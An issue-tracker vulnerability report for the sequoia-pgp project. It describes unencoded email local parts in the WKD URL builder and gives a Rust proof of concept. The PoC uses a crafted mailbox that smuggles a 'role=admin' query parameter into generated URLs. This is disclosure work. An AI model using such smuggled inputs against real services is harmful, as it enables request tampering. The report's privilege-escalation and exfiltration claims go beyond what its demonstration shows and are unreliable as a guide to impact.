[Vulnerability] sequoia_net WKD URL builder injects raw local parts into query strings (#1219) · Issues · sequoia-pgp / sequoia

[Vulnerability] sequoia_net WKD URL builder injects raw local parts into query strings

Severity High `net::wkd::Url::build` appends the user-controlled local part directly into the `?l=` query parameter without any percent-encoding.【F:net/src/wkd.rs†L79-L105】 Local parts may legally contain characters such as `+`, `=`, `&`, or `%`, so an attacker can smuggle additional parameters or even fragment identifiers into the generated request URL. Clients using the helper to construct WKD lookups may therefore leak policy decisions or trigger server-side quirks that depend on the extra query parameters. ## Proof of Concept The following proof-of-concept shows how a crafted email address injects a fake `role=admin` parameter into the URL returned by `Url::build`: The file was saved to /sequoia/net/example/email.rs and executed via \``` cargo run --no-default-features --features "crypto-rust,allow-experimental-crypto,allow-variable-time-crypto" --example email` `` ```rust use sequoia_net::wkd::{Url, Variant}; fn main() -> anyhow::Result<()> { // Crafted email with attacker-controlled query injection let email = "alice+tag&role=admin@example.org"; let url = Url::from(email)?; let advanced = url.build(None::<Variant>); let direct = url.build(Some(Variant::Direct)); let injected = "role=admin"; println!("\n[+] ✅ WKD URL Injection Demonstration"); println!(" ► Input mailbox: {email}"); if advanced.contains(injected) || direct.contains(injected) { println!(" ✅ Injected parameter detected in generated URLs!"); } else { println!(" ❌ Injection not observed (unexpected)"); } println!("\nGenerated URLs:"); println!(" Advanced lookup: {advanced}"); println!(" Direct lookup: {direct}\n"); Ok(()) } ``` After execution we see Both printed URLs contain ?l=alice+tag&role=admin, proving that the local part is spliced verbatim into the query string. Any intermediary that logs or interprets the request now sees the injected role parameter, which can be used to escalate privileges in brittle WKD deployments or to exfiltrate data via crafted mailbox names. ![image.png](/uploads/cd25440e7cee92373c2c811cf4fc9ad6/image.png){width="1440" height="459"} Last commint hash \`05e6707ad2c68fa52a30c3c9a21d54dc00089919\`

issue